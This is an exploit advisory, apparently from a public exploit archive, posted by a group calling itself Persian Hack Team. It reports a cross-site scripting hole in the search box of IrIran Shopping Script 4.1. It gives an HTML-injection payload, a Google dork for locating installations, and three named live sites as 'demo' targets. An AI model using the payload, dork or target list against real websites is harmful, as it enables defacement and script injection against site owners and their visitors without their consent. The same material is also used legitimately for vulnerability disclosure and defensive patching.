IrIran Shopping Script version 4.1 suffers from a cross site scripting vulnerability.
828edab3e7924d0f81c1fce38155f8638c3e73f0a9314ba81f3edfc6c8485c69
######################
# Exploit Title : IrIran Shoping Script Cross Site Scripting Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.iriran.net/eshopbuilder/
# Google Dork : "Powered by: IRIran.net"
# Date: 2016/04/26
# Category: [ Webapps ]
# Tested on: [Win /php ]
# Version : 4.1
######################
# PoC:
# Search Box Vulnerable To XSS
# Payload = <marquee><font color=red size=4>Only For Security Alert c_C </font></marquee>
#
# Demo:
# http://www.testiran.com/search/index.php
# http://www.ebookiran.ir/search/index.php
# http://www.tech4.ir/search/index.php
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Greetz : All Persian Hack Team Members
# Homepage : persian-team.ir
######################